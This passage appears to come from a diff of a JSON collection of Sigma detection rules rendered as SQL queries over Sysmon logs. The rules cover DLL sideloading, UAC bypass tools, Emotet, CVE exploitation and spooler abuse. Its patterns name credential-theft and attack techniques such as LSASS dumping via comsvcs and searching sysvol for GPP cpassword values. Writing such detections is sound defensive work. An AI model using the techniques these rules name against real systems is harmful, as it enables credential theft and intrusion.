'%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT 
(((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", 
"status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ "attack.execution", "attack.t1059" 
@@ -5770,34 +5598,40 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", - "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "status": "test", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' 
OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", 
@@ -5808,977 +5642,973 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', 
'3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", - "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": 
"proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "APT PRIVATELOG 
Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1203", "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE 